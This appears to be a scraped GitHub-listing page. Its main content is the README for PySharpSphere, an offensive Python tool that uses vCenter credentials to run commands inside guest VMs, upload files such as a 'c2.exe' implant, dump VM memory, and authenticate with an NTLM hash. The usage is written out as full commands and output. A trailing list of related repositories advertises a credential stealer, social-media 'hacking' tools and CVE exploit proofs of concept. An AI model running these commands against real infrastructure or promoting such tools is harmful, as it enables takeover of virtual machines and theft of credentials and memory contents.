PySharpSphere - Inspired by SharpSphere, just another python version

Related tags

Security related resourcesPySharpSphere
Overview

PySharpSphere

Inspired by SharpSphere, just another python version.

Installation

python3 setup.py install

Features

  • Support control both Linux and Windows system of virtual machines
  • Execute commands, upload files and dump memory on target guest OS
  • Use NTLM token to execute commands on guest Windows system

SharpSphere Guide

PySharpSphere Usage

usage: pySharpSphere [-h] [-H HOST] [-P PORT] [-u USER] [-p PASSWORD]
                     [-c CERT] [-k KEY] [-d DOMAIN]
                     {list,execute,upload,dump} ...

positional arguments:
  {list,execute,upload,dump}
                        sub-command
    list                list virtual machines
    execute             execute command on target machine
    upload              upload file to target machine
    dump                dump memory of target machine

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  vCenter Server host
  -P PORT, --port PORT  vCenter Server port
  -u USER, --username USER
                        vCenter Server username
  -p PASSWORD, --password PASSWORD
                        vCenter Server password

0. List virtual machines

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password list
[*] Retrieve virtual machines list ...
DataCenter    MoID     Name                           Power    OS                                         Tools         IP
------------  -------  -----------------------------  -------  -----------------------------------------  ------------  --------------
Datacenter    vm-1015  Windows Server 2012 (VC67)     Off      Microsoft Windows Server 2012 (64-bit)     Current
Datacenter    vm-1030  VMware vCenter Server 7.0U2b   On       Other 3.x or later Linux (64-bit)          Unmanaged     192.168.100.49
Datacenter    vm-1017  VMware vCenter Server 6.7U3l   Off      Other 3.x or later Linux (64-bit)          Unmanaged
Datacenter    vm-1020  Operation Machine (Windows 7)  On       Microsoft Windows 7 (64-bit)               Current       192.168.100.2

1. Execute commands on guest OS

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password execute -t vm-1020 --guest-user administrator --guest-pass guestpassword -c whoami
[*] Execute command on target virtual machine ...
[*] Retrieve virtual machines list ...
[*] Target OS is Windows, using C:\Windows\system32\cmd.exe to execute command ...
[+] Process start successfully with PID 1200
[*] Program exited, retrieving output ...
[*] Command output:
operation-machi\administrator

2. Upload file to target virtual machine

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password upload -t vm-1020 --guest-user administrator --guest-pass guestpassword --source /tmp/test.exe --dest C:\\c2.exe
[*] Retrieve virtual machines list ...
[*] Uploading file to VM 'vim.VirtualMachine:vm-1020' ...
[*] Sending file data ...
[+] Uploaded file to C:\c2.exe successfully

3. Dump memory of guest OS

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password dump -t vm-1020
[*] Retrieve virtual machines list ...
[*] Finding snapshot on target machine vm-1020
[+] Found exists snapshot!
[*] Finding snapshot files ...
[*] Downloading .vmsn file ...
[+] Downloaded successfully: Ubuntu-Snapshot1.vmsn
[*] Downloading .vmem file ...
[+] Downloaded successfully: Ubuntu-Snapshot1.vmem

4. Execute commands on guest OS using NTLM

$ pysharpsphere -H 192.168.100.49 -u [email protected] -p password execute -t vm-1015 --guest-user administrator --guest-ntlm ea41383fa39c20f186cbcdc0ac234417 -c whoami
[*] Execute command on target virtual machine ...
[*] Retrieve virtual machines list ...
[*] Target OS is Windows, using C:\Windows\system32\cmd.exe to execute command ...
[*] Starting NTLM authentication ...
[+] Process start successfully with PID 2624
[*] Program exited, retrieving output ...
[*] Command output:
win-i1el8084mf0\administrator
Owner
Ricter Zheng
uid=1337(ricter) gid=1337(ricter) groups=1001(ctf),1002(acg),1003(security)
Ricter Zheng
GitHub Repository
将hw时信息收集以及简单的漏洞操作步骤简单化

Braised-vegetables 将hw时信息收集以及简单的漏洞扫描操作步骤简单化 使用subfinder(被动子域名爆破收集) subdomain(主动域名爆破) nabbu(端口扫描) httpx(探测目录浏览) crawlergo(360深度爬虫) chorme(谷歌浏览器) xray(漏

19 Nov 15, 2022
Scan Site - Tools For Scanning Any Site and Get Site Information

Site Scanner Tools For Scanning Any Site and Get Site Information Example Require - pip install colorama - pip install requests How To Use Download Th

NumeX 5 Mar 19, 2022
It is a very simple XSS simulator based on flask, python.

It is a very simple XSS simulator based on flask, python. The purpose of making this is for teaching the concept of XSS.

Satin Wuker 3 May 10, 2022
Passphrase-wordlist - Shameless clone of passphrase wordlist

This repository is NOT official -- the original repository is located on GitLab

Jeff McJunkin 2 Feb 05, 2022
A small utility to deal with malware embedded hashes.

Uchihash is a small utility that can save malware analysts the time of dealing with embedded hash values used for various things such as: Dyn

Abdallah Elshinbary 48 Dec 19, 2022
Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries

Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries. Using xrefs to commonly injected and format string'd files, it will scan binaries faster than F

Christopher Roberts 3 Nov 16, 2021
This is tools hacking for scan vuln in port web, happy using

Xnuvers007 PortInjection this is tools hacking for scan vuln in port web, happy using view/show python 3.9 solo coder (tangerang) 19 y/o installation

XnuxersXploitXen 6 Dec 24, 2022
Detection And Breaking With Python

Detection And Breaking IIIIIIIIIIIIIIIIIIII PPPPPPPPPPPPPPPPP VVVVVVVV VVVVVVVV I::::::::II::::::::I P:::::::

Baris Dincer 1 Dec 26, 2021
NoSecerets is a python script that is designed to crack hashes extremely fast. Faster even than Hashcat

NoSecerets NoSecerets is a python script that is designed to crack hashes extremely fast. Faster even than Hashcat How does it work? Instead of taking

DosentTrust GithubDatabase 9 Jul 04, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Known issues it will not work outside kali , i will update it

Hossam 867 Dec 22, 2022
Details,PoC and patches for CVE-2021-45383 & CVE-2021-45384

CVE-2021-45383 & CVE-2021-45384 There are several network-layer vulnerabilities in the official server of Minecraft: Bedrock Edition (aka Bedrock Serv

20 Apr 07, 2022
Growtopia Save.dat Stealer

savedat-stealer Growtopia Save.dat Stealer (Auto Send To Webhook) How To Use After Change Webhook URL Compile script to exe Give to target Done Info C

NumeX 9 May 01, 2022
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE

CVE-2022-1388 CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE. POST /mgmt/tm/util/bash HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */

M4rtin Hsu 81 Dec 12, 2022
Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077

CVE-2021-44077 Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus 11306 Based on: https://xz.aliyun.com/t/106

Horizon 3 AI Inc 25 Nov 09, 2022
TOOLS CRACK FACEBOOK

Installation $ pkg update && pkg upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Mark-Zuck/zafi $ cd zafi $ pip2 instal

Romi Afrizal 50 Dec 26, 2022
hackinsta: a program to hack instagram

hackinsta a program to hack instagram Yokoback_(instahack) is the file to open, you need libraries write on import. You run that file in the same fold

1 Dec 04, 2021
CVE-2022-23046 - SQL Injection Vulnerability on PhpIPAM v1.4.4

CVE-2022-23046 PhpIPAM v1.4.4 allows an authenticated admin user to inject SQL s

2 Feb 15, 2022
Security tool to test different bypass of forbidden

notForbidden Security tool to test different bypass of forbidden Usage python3 notForbidden.py URL Features Bypass with different methods (POST, OPT

6 Sep 08, 2022
A simple way to store your passwords without requiring third party applications

SimplePasswordManager A simple way to store your passwords without requiring third party applications Simple To Use. Store Your Passwords For Each Web

Leone Odinga 1 Dec 23, 2021
Sample exploits for Zephyr CVE-2021-3625

CVE-2021-3625 This repository contains a few example exploits for CVE-2021-3625. All Zephyr-based usb devices up to (and including) version 2.5.0 suff

7 Nov 10, 2022